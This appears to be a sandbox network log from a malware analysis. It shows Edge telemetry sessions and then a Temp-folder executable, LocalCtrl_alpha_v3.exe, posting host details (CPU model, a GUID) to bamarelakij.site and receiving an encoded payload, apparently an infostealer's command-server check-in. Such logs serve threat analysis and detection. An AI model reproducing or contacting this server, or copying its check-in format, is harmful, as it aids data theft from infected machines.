2025-01-09 13:56:18 UTC	4154	IN	Data Raw: 31 30 33 32 0d 0a 70 72 67 2d 77 70 6f 2d 69 6e 66 6f 70 72 6d 2d 63 74 72 6c 22 21 3d 65 29 29 2e 6a 6f 69 6e 28 22 2c 22 29 3b 6e 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2e 73 65 74 28 22 66 64 68 65 61 64 22 2c 65 29 7d 5b 22 73 77 22 2c 22 65 64 67 45 78 70 4d 61 73 6b 22 5d 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 6e 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2e 64 65 6c 65 74 65 28 65 29 29 29 7d 72 65 74 75 72 6e 20 65 2e 73 74 72 69 70 4c 6f 63 61 74 69 6f 6e 26 26 5b 22 6c 6f 63 61 74 69 6f 6e 22 5d 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 6e 2e 73 65 61 72 63 68 50 61 72 61 6d 73 2e 64 65 6c 65 74 65 28 65 29 29 29 2c 65 2e 69 73 46 75 72 74 68 65 72 4e 6f 72 6d 61 6c 69 7a 65 64 46 6f 72 46 65 65 64 43 61 6c 6c 26 26 28 5b 22 63 62 79 70 61 73 73 22 2c Data Ascii: 1032prg-wpo-infoprm-ctrl"!=e)).join(",");n.searchParams.set("fdhead",e)}["sw","edgExpMask"].forEach((e=>n.searchParams.delete(e)))}return e.stripLocation&&["location"].forEach((e=>n.searchParams.delete(e))),e.isFurtherNormalizedForFeedCall&&(["cbypass",
2025-01-09 13:56:18 UTC	8200	IN	Data Raw: 32 30 30 30 0d 0a 3c 31 65 33 2a 74 68 69 73 2e 5f 6d 69 6e 43 61 63 68 65 41 67 65 53 65 63 6f 6e 64 73 29 72 65 74 75 72 6e 20 74 7d 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 73 74 61 6c 65 57 68 69 6c 65 52 65 76 61 6c 69 64 61 74 65 53 74 72 61 74 65 67 79 2e 68 61 6e 64 6c 65 28 65 29 7d 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 47 6f 74 20 61 20 6e 75 6c 6c 20 72 65 73 70 6f 6e 73 65 20 66 72 6f 6d 20 74 68 65 20 63 61 63 68 65 22 29 7d 29 29 2e 63 61 74 63 68 28 28 28 29 3d 3e 74 68 69 73 2e 5f 6e 65 74 77 6f 72 6b 46 69 72 73 74 53 74 72 61 74 65 67 79 2e 68 61 6e 64 6c 65 28 65 29 29 29 7d 7d 63 6f 6e 73 74 20 53 74 3d 38 36 34 30 30 2c 78 74 3d 35 31 38 34 65 33 2c 6b 74 3d 22 6f 66 66 69 63 65 22 3b 66 75 6e 63 74 69 6f 6e 20 50 74 28 65 Data Ascii: 2000<1e3*this._minCacheAgeSeconds)return t}return this._staleWhileRevalidateStrategy.handle(e)}throw new Error("Got a null response from the cache")})).catch((()=>this._networkFirstStrategy.handle(e)))}}const St=86400,xt=5184e3,kt="office";function Pt(e
2025-01-09 13:56:18 UTC	15	IN	Data Raw: 61 0d 0a 64 65 26 26 28 73 65 6c 66 2e 0d 0a Data Ascii: ade&&(self.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.10	50067	52.182.143.215	443	3704	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:19 UTC	1036	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430978081&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 10988 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=3D203036AC4A619B0A382559AD536038; _EDGE_S=F=1&SID=3CF5BEC365736FE426CFABAC64116EFD; _EDGE_V=1; _C_ETH=1
2025-01-09 13:56:19 UTC	10988	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 35 36 3a 31 38 2e 30 37 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 61 61 31 30 35 66 35 35 2d 66 65 32 36 2d 34 33 62 33 2d 61 63 66 66 2d 61 32 31 36 66 34 37 33 61 61 39 61 22 2c 22 65 70 6f 63 68 22 3a 22 33 38 33 30 36 33 37 31 34 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-09T13:56:18.079Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"aa105f55-fe26-43b3-acff-a216f473aa9a","epoch":"3830637148"},"app":{"locale
2025-01-09 13:56:20 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=355d961c0d694d1180df58dc313250ae&HASH=355d&LV=202501&V=4&LU=1736430980036; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:56:20 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=12e88f2b7faa4466b0e76b55450cacd7; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:26:20 GMT; Path=/;Secure; SameSite=None time-delta-millis: 1955 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Thu, 09 Jan 2025 13:56:20 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.10	50068	52.182.143.215	443	3704	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:20 UTC	1035	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430978091&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 4803 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=3D203036AC4A619B0A382559AD536038; _EDGE_S=F=1&SID=3CF5BEC365736FE426CFABAC64116EFD; _EDGE_V=1; _C_ETH=1
2025-01-09 13:56:20 UTC	4803	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 35 36 3a 31 38 2e 30 39 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 61 61 31 30 35 66 35 35 2d 66 65 32 36 2d 34 33 62 33 2d 61 63 66 66 2d 61 32 31 36 66 34 37 33 61 61 39 61 22 2c 22 65 70 6f 63 68 22 3a 22 33 38 33 30 36 33 37 31 34 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-09T13:56:18.090Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"aa105f55-fe26-43b3-acff-a216f473aa9a","epoch":"3830637148"},"app":{"locale
2025-01-09 13:56:20 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=de864fdb2f2a4ca8b17195427ec969e7&HASH=de86&LV=202501&V=4&LU=1736430980208; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:56:20 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=2e2ad07b21274760942f95232d213fb9; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:26:20 GMT; Path=/;Secure; SameSite=None time-delta-millis: 2117 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Thu, 09 Jan 2025 13:56:19 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.10	50071	52.182.143.215	443	3704	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:20 UTC	1033	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430978935&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 5380 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=3D203036AC4A619B0A382559AD536038; _EDGE_S=F=1&SID=3CF5BEC365736FE426CFABAC64116EFD; _EDGE_V=1; msnup=
2025-01-09 13:56:20 UTC	5380	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 35 36 3a 31 38 2e 39 33 33 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 34 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 61 61 31 30 35 66 35 35 2d 66 65 32 36 2d 34 33 62 33 2d 61 63 66 66 2d 61 32 31 36 66 34 37 33 61 61 39 61 22 2c 22 65 70 6f 63 68 22 3a 22 33 38 33 30 36 33 37 31 34 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2025-01-09T13:56:18.933Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"aa105f55-fe26-43b3-acff-a216f473aa9a","epoch":"3830637148"},"app":{"locale
2025-01-09 13:56:20 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=2d07a239bb6d463b8289167e82c6b66f&HASH=2d07&LV=202501&V=4&LU=1736430980851; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:56:20 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=8b2bb18cd56e49a4ad37fc5391ff98ee; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:26:20 GMT; Path=/;Secure; SameSite=None time-delta-millis: 1916 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Thu, 09 Jan 2025 13:56:19 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.10	50073	52.182.143.215	443	3704	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:20 UTC	1033	OUT	POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736430979077&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1 Host: browser.events.data.msn.com Connection: keep-alive Content-Length: 9881 sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ntp.msn.com Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8 Cookie: USRLOC=; MUID=3D203036AC4A619B0A382559AD536038; _EDGE_S=F=1&SID=3CF5BEC365736FE426CFABAC64116EFD; _EDGE_V=1; msnup=
2025-01-09 13:56:20 UTC	9881	OUT	Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 43 6f 6e 74 65 6e 74 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 39 54 31 33 3a 35 36 3a 31 39 2e 30 37 36 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 35 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 61 61 31 30 35 66 35 35 2d 66 65 32 36 2d 34 33 62 33 2d 61 63 66 66 2d 61 32 31 36 66 34 37 33 61 61 39 61 22 2c 22 65 70 6f 63 68 22 3a 22 33 38 33 30 36 33 37 31 34 38 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 Data Ascii: {"name":"MS.News.Web.ContentView","time":"2025-01-09T13:56:19.076Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"aa105f55-fe26-43b3-acff-a216f473aa9a","epoch":"3830637148"},"app":{"loc
2025-01-09 13:56:21 UTC	890	IN	HTTP/1.1 204 No Content Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Strict-Transport-Security: max-age=31536000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: MC1=GUID=ef4c3b597d65489baecf7d9466ac0737&HASH=ef4c&LV=202501&V=4&LU=1736430981058; Domain=.microsoft.com; Expires=Fri, 09 Jan 2026 13:56:21 GMT; Path=/;Secure; SameSite=None Set-Cookie: MS0=5f9f85638fa346f99f1c34a36e41a81d; Domain=.microsoft.com; Expires=Thu, 09 Jan 2025 14:26:21 GMT; Path=/;Secure; SameSite=None time-delta-millis: 1981 Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis Access-Control-Allow-Methods: POST Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com Access-Control-Expose-Headers: time-delta-millis Date: Thu, 09 Jan 2025 13:56:20 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.10	50086	172.67.174.91	443	6996	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:56:30 UTC	352	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 Content-Length: 147 Host: bamarelakij.site
2025-01-09 13:56:30 UTC	147	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 00 60 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 97 00 a0 d9 26 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a a0 ce 64 0d 7a 80 cf 01 d9 f5 d7 9d 1e 13 ec d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: `&Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzdz$9e146be9-c76a-4720-bcdb-53011b87bd06
2025-01-09 13:56:31 UTC	817	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 13:56:31 GMT Transfer-Encoding: chunked Connection: close v: MIInk2VASMakRiAiuFh4O58vm3Lst27Hf6ZO4CPW7oP+2v/W8WPumTC8rWVJF1+o cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hQj8r8gMnpzDrupabEps8izWOYWygdh7WxEcR8RSuMFajjKyC3O55Zx0avVgiY6bv%2Be%2BeOUE1u05y45tQn7S4ELwqtT%2Fw8qzcEDifmJE%2FtMGmxBacDK8dNAHvT3ZrH7mQFwt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4ee5c2ad7437b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2161&min_rtt=1608&rtt_var=998&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1135&delivery_rate=1815920&cwnd=249&unsent_bytes=0&cid=acf11942e1d40225&ts=698&x=0"
2025-01-09 13:56:31 UTC	17	IN	Data Raw: 63 0d 0a f2 82 00 00 00 00 00 00 00 00 00 00 0d 0a Data Ascii: c
2025-01-09 13:56:31 UTC	1369	IN	Data Raw: 33 32 65 36 0d 0a e0 c7 0b 36 0e 00 7f 0e 86 0b 13 00 ec 0e 16 11 02 ec 08 7a 59 86 0b 65 9b b6 a7 b7 51 c9 59 b3 b2 b1 b5 b7 af 31 39 b7 bb b9 b2 39 b9 20 00 96 09 05 0f 13 00 ec 0e 16 11 02 ec 08 3e 59 05 0f 65 9b b6 a7 b7 51 c9 59 a9 a7 23 2a ab a0 29 a2 2e ab a7 ab 1b 1a 99 19 27 b7 32 b2 2e 2b b0 36 3b b2 2e a9 3a b2 b0 b6 04 00 ac 09 ce 02 0f 00 e4 0e 16 11 02 e4 04 34 59 ce 02 bc 58 d8 c3 49 7d 17 f0 0b 00 42 01 a9 05 13 00 ec 0e 16 11 02 ec 08 34 59 a9 05 65 9b b6 a7 b7 51 c9 59 28 39 b2 33 b2 39 b2 37 b1 b2 b9 04 00 c6 03 32 0c 0f 00 e4 0e 16 11 02 e4 04 72 59 32 0c 65 fc e2 b9 9f d9 2d 8a 04 00 24 09 7a 0d 0f 00 e4 0e 16 11 02 e4 04 76 59 7a 0d f9 87 f9 1f 08 a2 36 2c 20 00 da 0c 94 00 13 00 ec 0e 16 11 02 ec 08 76 59 94 00 65 9b b6 a7 b7 51 c9 Data Ascii: 32e66zYeQY199 >YeQY#*).'2.+6;.:4YXI}B4YeQY(93972rY2e-$zvYz6, vYeQ
2025-01-09 13:56:31 UTC	1369	IN	Data Raw: a4 37 32 b2 3c b2 32 22 21 2e b1 34 39 b7 b6 b2 96 b2 3c 3a b2 37 b9 b4 b7 37 af b3 b7 35 34 b1 32 b3 b1 38 31 38 33 b4 b3 b1 b0 b2 35 38 33 34 33 b2 b3 b2 b5 32 b3 b4 31 36 b5 af 18 17 b4 37 32 b2 3c b2 32 32 31 17 36 b2 3b b2 36 32 31 01 00 ee 0c 76 0a 13 00 ec 0e 16 11 02 ec 08 ed 59 76 0a 65 9b b6 a7 b7 51 c9 59 05 08 00 3a 06 a4 0e 13 00 ec 0e 16 11 02 ec 08 73 59 a4 0e 65 9b b6 a7 b7 51 c9 59 b9 b2 3a 3a b4 37 b3 b9 0d 00 e8 0c c1 02 13 00 ec 0e 16 11 02 ec 08 76 59 c1 02 65 9b b6 a7 b7 51 c9 59 26 b7 b1 b0 36 10 a9 3a b7 39 b0 b3 b2 08 00 8a 03 eb 0b 13 00 ec 0e 16 11 02 ec 08 72 59 eb 0b 65 9b b6 a7 b7 51 c9 59 3a 3c 34 b4 37 3a b9 15 04 00 c7 0d 8c 0e 0f 00 e4 0e 16 11 02 e4 04 34 59 8c 0e 9e 1e b5 b8 6b 3b 7a 8b 04 00 cb 0a e2 03 0f 00 e4 0e 16 Data Ascii: 72<2"!.49<:7754281835834321672<2216;621vYveQY:sYeQY::7vYeQY&6:9rYeQY:<47:4Yk;z
2025-01-09 13:56:31 UTC	1369	IN	Data Raw: 02 ec 08 76 59 fc 04 65 9b b6 a7 b7 51 c9 59 38 39 b7 33 b4 36 b2 b9 21 00 7f 04 05 0e 13 00 ec 0e 16 11 02 ec 08 34 59 05 0e 65 9b b6 a7 b7 51 c9 59 a7 ba 3a 36 b7 b7 b5 19 18 98 1b 2e a0 38 38 22 b0 3a b0 2e 26 b7 b1 b0 36 2e a7 ba 3a 36 b7 b7 b5 08 00 dc 03 6b 04 13 00 eb 0e 16 11 02 eb 08 9a 59 6b 04 fa 7c d0 f1 1d 72 d0 75 0b e2 4f 96 21 41 96 86 04 00 93 0c f6 0a 0f 00 e4 0e 16 11 02 e4 04 72 59 f6 0a 7b 34 35 38 8b 11 fa 0b 08 00 e1 06 36 03 13 00 eb 0e 16 11 02 eb 08 76 59 36 03 48 be bd a0 fa 4e 2a 71 b8 20 22 c7 c6 7d 6c 82 04 00 77 0e a6 0c 0f 00 e4 0e 16 11 02 e4 04 72 59 a6 0c de 2d 81 4c 2f 08 4e 7f 19 00 c1 01 65 06 13 00 ec 0e 16 11 02 ec 08 73 59 65 06 65 9b b6 a7 b7 51 c9 59 b6 b2 b9 b9 b2 37 b3 b2 39 b9 2e 22 b4 b9 b1 b7 39 32 2e a1 b0 Data Ascii: vYeQY8936!4YeQY:6.88":.&6.:6kYk\|ruO!ArY{4586vY6HN*q "}lwrY-L/NesYeeQY79."92.
2025-01-09 13:56:31 UTC	1369	IN	Data Raw: 0f 00 e4 0e 16 11 02 e4 04 34 59 4c 09 70 89 a2 0d 81 ac 6d 3e 09 00 cc 05 88 07 13 00 ec 0e 16 11 02 ec 08 34 59 88 07 65 9b b6 a7 b7 51 c9 59 a4 37 32 b2 3c b2 32 22 21 0a 00 37 04 08 0e 13 00 ec 0e 16 11 02 ec 08 76 59 08 0e 65 9b b6 a7 b7 51 c9 59 b6 b9 b2 32 b3 b2 17 b2 3c b2 0b 00 ef 03 72 0f 13 00 ec 0e 16 11 02 ec 08 3e 59 72 0f 65 9b b6 a7 b7 51 c9 59 15 b9 3a b2 b0 b6 15 17 b2 3c b2 11 00 fd 0b 46 03 13 00 ec 0e 16 11 02 ec 08 9a 59 46 03 65 9b b6 a7 b7 51 c9 59 a9 a7 23 2a ab a0 29 a2 2e 2a b4 b3 b2 39 2b 27 a1 11 00 9a 05 08 07 13 00 ec 0e 16 11 02 ec 08 76 59 08 07 65 9b b6 a7 b7 51 c9 59 b1 34 39 b7 b6 b4 ba b6 af 31 39 b7 bb b9 b2 39 b9 08 00 74 0f fb 05 13 00 eb 0e 16 11 02 eb 08 34 59 fb 05 00 ab 5b 92 bc 4e 15 2c f5 35 c4 f5 80 7d 53 df Data Ascii: 4YLpm>4YeQY72<2"!7vYeQY2<r>YreQY:<FYFeQY#).9+'vYeQY49199t4Y[N,5}S
2025-01-09 13:56:31 UTC	1369	IN	Data Raw: 02 ec 08 ed 59 98 04 65 9b b6 a7 b7 51 c9 59 15 17 39 32 38 04 00 f5 0e e9 0a 0f 00 e4 0e 16 11 02 e4 04 76 59 e9 0a 2c 36 e8 17 dc f2 d2 21 0b 00 96 04 66 0e 13 00 ec 0e 16 11 02 ec 08 ed 59 66 0e 65 9b b6 a7 b7 51 c9 59 a0 37 bc 22 b2 b9 b5 17 b2 3c b2 08 00 1b 0f 85 0c 13 00 eb 0e 16 11 02 eb 08 d8 59 85 0c 42 e9 cd 96 64 55 b8 e2 b3 77 52 f1 58 66 fe 11 06 00 23 01 93 0f 13 00 ec 0e 16 11 02 ec 08 72 59 93 0f 65 9b b6 a7 b7 51 c9 59 a0 39 b6 b7 39 bc 04 00 fa 05 f8 04 0f 00 e4 0e 16 11 02 e4 04 61 59 f8 04 84 f8 45 7e 75 dd 8a 4d 08 00 68 0c ae 06 13 00 ec 0e 16 11 02 ec 08 5b 59 ae 06 65 9b b6 a7 b7 51 c9 59 28 b0 b9 b9 bb b7 39 32 04 00 31 0c 76 0f 0f 00 e4 0e 16 11 02 e4 04 34 59 76 0f 71 a1 31 f5 80 84 fe c6 07 00 b1 04 2e 08 13 00 ec 0e 16 11 02 Data Ascii: YeQY928vY,6!fYfeQY7"<YBdUwRXf#rYeQY99aYE~uMh[YeQY(921v4Yvq1.
